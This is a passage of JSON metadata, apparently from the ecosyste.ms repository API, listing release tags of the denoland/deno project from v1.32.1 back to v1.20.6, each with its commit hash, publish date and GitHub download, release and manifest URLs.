ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2/manifests"},{"name":"v1.32.1","sha":"99b5eaa2f4f81b0f6fb46a388808a0d8f40b91e1","kind":"commit","published_at":"2023-03-23T20:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1/manifests"},{"name":"v1.32.0","sha":"d06fdf6add1b3c55fc5f4a24956f17a363d513a4","kind":"commit","published_at":"2023-03-22T23:03:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0/manifests"},{"name":"v1.31.3","sha":"f64adbe1a3b924b9436afa39b4302c5718bbb759","kind":"commit","published_at":"2023-03-16T05:41:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3/manifests"},{"name":"v1.31.2","sha":"fc6edac5978e7a5e44fdcee05085c7492f0ccba9","kind":"commit","published_at":"2023-03-10T06:41:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2/manifests"},{"name":"v1.31.1","sha":"86785f21194460d713276dca212302fa1bb1c943","kind":"commit","published_at":"2023-02-25T02:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1/manifests"},{"name":"v1.31.0","sha":"b6ac54815c1bcfa44a45b3f2c1c982829482477f","kind":"commit","published_at":"2023-02-24T00:20:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0/manifests"},{"name":"v1.30.3","sha":"f3fb8ee18826e66d3896ea864d2bedaed6c79308","kind":"commit","published_at":"2023-02-07T01:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3/manifests"},{"name":"v1.30.2","sha":"cee13304ffe58286fcfab3526c46f95a7e23825d","kind":"commit","published_at":"2023-02-03T14:46:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2/manifests"},{"name":"v1.30.1","sha":"000fb83c587a17118d83b990f1d08c98bb9cce2a","kind":"commit","published_at":"2023-02-02T14:26:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1/manifests"},{"name":"v1.30.0","sha":"a6f915c22f34921780b4bcb8b6da8cd3bd20d5a8","kind":"commit","published_at":"2023-01-25T23:15:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0/manifests"},{"name":"v1.29.4","sha":"65db94feba9d4d51a09b74629f566dbc90484fba","kind":"commit","published_at":"2023-01-16T22:07:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4/manifests"},{"name":"v1.29.3","sha":"9806dcc91496ab12c7fba238d411e23c22e2a302","kind":"commit","published_at":"2023-01-13T17:17:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3/manifests"},{"name":"v1.29.2","sha":"14c4c8f9340235bd1ddb5388558c984beb0bb6d9","kind":"commit","published_at":"2023-01-05T13:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2/manifests"},{"name":"v1.29.1","sha":"145013ab7fb00c7293ce33806f26dc4083a8da66","kind":"commit","published_at":"2022-12-15T16:32:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1/manifests"},{"name":"v1.29.0","sha":"0d4e4af7acf82c1365999a7281910daa05f0e982","kind":"commit","published_at":"2022-12-14T23:22:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0/manifests"},{"name":"v1.28.3","sha":"74064c9d8c222b33b2a552ea0af1054f57002a96","kind":"commit","published_at":"2022-12-01T10:10:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3/manifests"},{"name":"v1.28.2","sha":"1aca16e23998ee54f6a15217cd4cc6b8b13299b7","kind":"commit","published_at":"2022-11-24T20:22:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2/manifests"},{"name":"v1.28.1","sha":"2743d42099cb0596f03c7d1252e5cfbb53f7a9ec","kind":"commit","published_at":"2022-11-16T23:35:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1/manifests"},{"name":"v1.28.0","sha":"916598f8a77d1fb7b7feb577e600ead2bc45045f","kind":"commit","published_at":"2022-11-13T20:31:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0/manifests"},{"name":"v1.27.2","sha":"5cd5cfa8d655e8a71441cf9736df93efde75153c","kind":"commit","published_at":"2022-11-08T21:42:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2/manifests"},{"name":"v1.27.1","sha":"d448c2950db2ed474405ace6a0a180301eeaa68d","kind":"commit","published_at":"2022-11-03T21:52:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1/manifests"},{"name":"v1.27.0","sha":"b0fb8fa9dc08640e77eb0ab888a483db18a52a4b","kind":"commit","published_at":"2022-10-27T15:13:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0/manifests"},{"name":"v1.26.2","sha":"d1f432bf12e5de645d45f1f2738a53981f39fa5b","kind":"commit","published_at":"2022-10-17T18:51:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2/manifests"},{"name":"v1.26.1","sha":"753b60dd9b0c9bb5220609f2fe65ad06957690d6","kind":"commit","published_at":"2022-10-06T17:16:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1/manifests"},{"name":"v1.26.0","sha":"d8827514ffef04c2e1732f7033ff6a374dd94d54","kind":"commit","published_at":"2022-09-28T22:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0/manifests"},{"name":"v1.25.4","sha":"02afbe2af550ad5223d982e8fdd37f778b9d828c","kind":"commit","published_at":"2022-09-22T18:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4/manifests"},{"name":"v1.25.3","sha":"f561e765a75c749f1d1e2d6584edf6018435e6e1","kind":"commit","published_at":"2022-09-15T17:46:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3/manifests"},{"name":"v1.25.2","sha":"3c5af2ba495b2d5770b3f5ed12e202ba2089ebda","kind":"commit","published_at":"2022-09-09T08:54:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2/manifests"},{"name":"v1.25.1","sha":"1e78804d5c0b8204978dd77431ac33d8d16ce5bc","kind":"commit","published_at":"2022-09-02T00:07:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1/manifests"},{"name":"v1.25.0","sha":"8986e2ced4adbf6185aea02a580036aa92c2872c","kind":"commit","published_at":"2022-08-24T22:20:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0/manifests"},{"name":"v1.24.3","sha":"c79127061438234a60f63cf9d0a276328961f971","kind":"commit","published_at":"2022-08-11T18:38:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3/manifests"},{"name":"v1.24.2","sha":"44ade24fb213875814c431c87abb3f79ecab1fef","kind":"commit","published_at":"2022-08-04T20:49:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2/manifests"},{"name":"v1.24.1","sha":"fa9698fe9ec3ceb660c1865eb75f07a0bc5b90c5","kind":"commit","published_at":"2022-07-28T17:22:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1/manifests"},{"name":"v1.24.0","sha":"f0e01682cce638303e3b6997788667a0f71dff8d","kind":"commit","published_at":"2022-07-20T23:28:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0/manifests"},{"name":"v1.23.4","sha":"b0de3031dcfe6eab1156a2546b996005d1c07cfe","kind":"commit","published_at":"2022-07-12T18:55:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4/manifests"},{"name":"v1.23.3","sha":"0b07d1a40318147ec0782af9fe99048d5ef80984","kind":"commit","published_at":"2022-07-05T17:00:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3/manifests"},{"name":"v1.23.2","sha":"5a5d3084ab0f20c511a70a1f2e12ef7bdd184ec2","kind":"commit","published_at":"2022-06-30T19:31:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2/manifests"},{"name":"v1.23.1","sha":"9f9941c03b942469fb651477503f8cd19f18a1ab","kind":"commit","published_at":"2022-06-23T19:50:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1/manifests"},{"name":"v1.23.0","sha":"e7ea4edc8a1a4fc339ac2267d9512a9374bc2ce5","kind":"commit","published_at":"2022-06-15T23:02:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0/manifests"},{"name":"v1.22.3","sha":"43e7c5d328a5a17a8c33362caf642d6ded49f179","kind":"commit","published_at":"2022-06-09T18:55:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3/manifests"},{"name":"v1.22.2","sha":"783f7661ef74a56dcc8a3a382adc8cf559ec75e5","kind":"commit","published_at":"2022-06-02T17:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2/manifests"},{"name":"v1.22.1","sha":"6a7151539737e4abe1b12095c9e1bc3ed9376f48","kind":"commit","published_at":"2022-05-27T04:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1/manifests"},{"name":"v1.22.0","sha":"5ad8919d642b646caa3328930dd1a3f290bc587e","kind":"commit","published_at":"2022-05-18T15:05:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0/manifests"},{"name":"v1.21.3","sha":"d14b77b58e3598ea28712473ea832e22070940ca","kind":"commit","published_at":"2022-05-12T14:14:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3/manifests"},{"name":"v1.21.2","sha":"2256c697aedc2d2d2d856a4faa0816521a02692a","kind":"commit","published_at":"2022-05-05T20:56:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2/manifests"},{"name":"v1.21.1","sha":"58bedd8d8422cf0ef6f9a581b188055a74cd9304","kind":"commit","published_at":"2022-04-28T20:33:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1/manifests"},{"name":"v1.21.0","sha":"29c8cd8aae52b89075e6af84ddd34f813fa3ea8d","kind":"commit","published_at":"2022-04-21T01:50:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0/manifests"},{"name":"v1.20.6","sha":"3ad1535e48505af3129c133408b496fa8eb7569c","kind":"commit","published_at":"2022-04-14T18:56:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6/m